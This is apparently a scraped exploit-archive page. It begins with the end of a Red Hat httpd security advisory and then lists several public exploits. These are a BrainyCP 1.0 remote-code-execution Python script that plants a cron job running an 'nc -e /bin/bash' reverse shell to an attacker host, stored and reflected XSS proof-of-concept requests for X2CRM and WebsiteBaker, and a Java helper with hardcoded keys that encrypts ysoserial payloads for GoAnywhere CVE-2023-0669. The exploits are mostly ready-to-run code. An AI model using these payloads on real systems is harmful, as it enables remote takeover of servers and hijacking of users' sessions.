mod_http2-debuginfo-1.15.19-3.el9_1.5.s390x.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.s390x.rpm  
mod_ldap-2.4.53-7.el9_1.5.s390x.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_lua-2.4.53-7.el9_1.5.s390x.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.s390x.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_session-2.4.53-7.el9_1.5.s390x.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.s390x.rpm  
mod_ssl-2.4.53-7.el9_1.5.s390x.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.s390x.rpm

x86_64:  
httpd-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-core-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-debugsource-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-devel-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-tools-2.4.53-7.el9_1.5.x86_64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_http2-1.15.19-3.el9_1.5.x86_64.rpm  
mod_http2-debuginfo-1.15.19-3.el9_1.5.x86_64.rpm  
mod_http2-debugsource-1.15.19-3.el9_1.5.x86_64.rpm  
mod_ldap-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_lua-2.4.53-7.el9_1.5.x86_64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_proxy_html-2.4.53-7.el9_1.5.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_session-2.4.53-7.el9_1.5.x86_64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ssl-2.4.53-7.el9_1.5.x86_64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25690  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDBH29zjgjWX9erEAQhFpw/9HSLo3H9yk8KOpnyrtD9alhqGMI4Uvw1O  
a6fRfNs6bD0ru8xdVJDjpXGOKTOgMW6p/zr789oAurWoEFr78mxPF68aliHjIA2v  
nvUNQtnvQmrGcVIWqbd0ANxBn9RMTnq7UoHLIkrbOwvpaKeb3cDPjry75qcjMaY0  
59wDL+dAUg00uZnQTSMr31wT+LxyKOKwRQqGF5Jyrd8Hcctwg2K01fcHh6Cu15Hn  
TDKGj2hdOXYqkaO09UxxwAh2GzZiJLA/oxp+RnbZzmKkgoezS7CBLLkVjJBRwf3r  
uyFFgSZqntzx2oXoOGMqiMSwFcN9c9f0Ga2i8/BBMAYeNNGHyTIp/tXGUBjZDgdc  
Ti8EA0MijRynkwAhEdXDO0u42iA9aGNsDy0ny0CykaGwi4RRu1dJRAM7z3oXkrnm  
dl3ZSjqA0jWGkP0419sPaLubmLXz0gYsayFSu9HwuvaDwxF6hn7wGAhVVTq5thQJ  
NyOGWCNEvVq5M7er4aYlU4blz/iQOSlDWUjMLjGKZJ70K7yuVpFzg0Hol/EOAfqZ  
DvgYTVBOJ0SIoEgdG6emyuSWqZ7pGfDPEE+Yo3YUKWMXKBR6Gw+eIUs6mwX7GGG1  
LtSP/q1u8dyPcXB1V+3D7Hgc/6vxR/ZXoWOrrdA6LaRVPAA4nupO7NpqImNz0sa2  
z+8/qJuTlfY=  
=zwk7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1670-01

BrainyCP version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: BrainyCP V1.0 - Remote Code Execution# Date: 2023-04-03# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://brainycp.io# Demo: https://demo.brainycp.io# Tested on: Kali Linux# CVE : N/Aimport requests# credentialsurl = input("URL: ")username = input("Username: ")password = input("Password: ")ip = input("IP: ")port = input("Port: ")# login session = requests.Session()login_url = f"{url}/auth.php"login_data = {"login": username, "password": password, "lan": "/"}response = session.post(login_url, data=login_data)if "Sign In" in response.text:    print("[-] Wrong credentials or may the system patched.")    exit()# reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash"# requestadd_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"add_cron_data = {    "cron_freq_minutes": "*",    "cron_freq_minutes_own": "",    "cron_freq_hours": "*",    "cron_freq_hours_own": "",    "cron_freq_days": "*",    "cron_freq_days_own": "",    "cron_freq_months": "*",    "cron_freq_weekdays": "*",    "cron_command": reverse_shell,    "cron_user": username,}response = session.post(add_cron_url, data=add_cron_data)print("[+] Check your listener!")

BrainyCP 1.0 Remote Code Execution

X2CRM versions 6.6 and 6.9 suffer from multiple cross site scripting vulnerabilities.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

X2CRM 6.6 / 6.9 Cross Site Scripting

Goanywhere Encryption Helper version 7.1.1 suffers from a remote code execution vulnerability.

    // Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)// Google Dork:  title:"GoAnywhere" // Date: 3/26/2023// Exploit Author: Youssef Muhammad// Vendor Homepage: https://www.goanywhere.com/// Software Link:  https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0// Version:  > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux// CVE : CVE-2023-0669// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64;import javax.crypto.Cipher;import java.nio.charset.StandardCharsets;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.PBEKeySpec;import javax.crypto.spec.IvParameterSpec;import javax.crypto.spec.SecretKeySpec;import java.nio.file.Files;import java.nio.file.Paths;public class CVE_2023_0669_helper {    static String ALGORITHM = "AES/CBC/PKCS5Padding";    static byte[] KEY = new byte[30];    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);    public static void main(String[] args) throws Exception {        if (args.length != 2) {            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");            System.exit(1);        }        String filePath = args[0];        String version = args[1];        byte[] fileContent = Files.readAllBytes(Paths.get(filePath));        String encryptedContent = encrypt(fileContent, version);        System.out.println(encryptedContent);    }    public static String encrypt(byte[] data, String version) throws Exception {        Cipher cipher = Cipher.getInstance(ALGORITHM);        KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();        SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");        IvParameterSpec ivSpec = new IvParameterSpec(IV);        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);        byte[] encryptedObject = cipher.doFinal(data);        String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);        String v = (version.equals("2")) ? "$2" : "";        bundle += v;        return bundle;    }    private static byte[] getInitializationValue() throws Exception {        // Version 1 Encryption        String param1 = "go@nywhereLicenseP@$$wrd";        byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();    }    private static byte[] getInitializationValueV2() throws Exception {        // Version 2 Encryption        String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";        byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();    }}

Goanywhere Encryption Helper 7.1.1 Remote Code Execution

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

Tag

#linux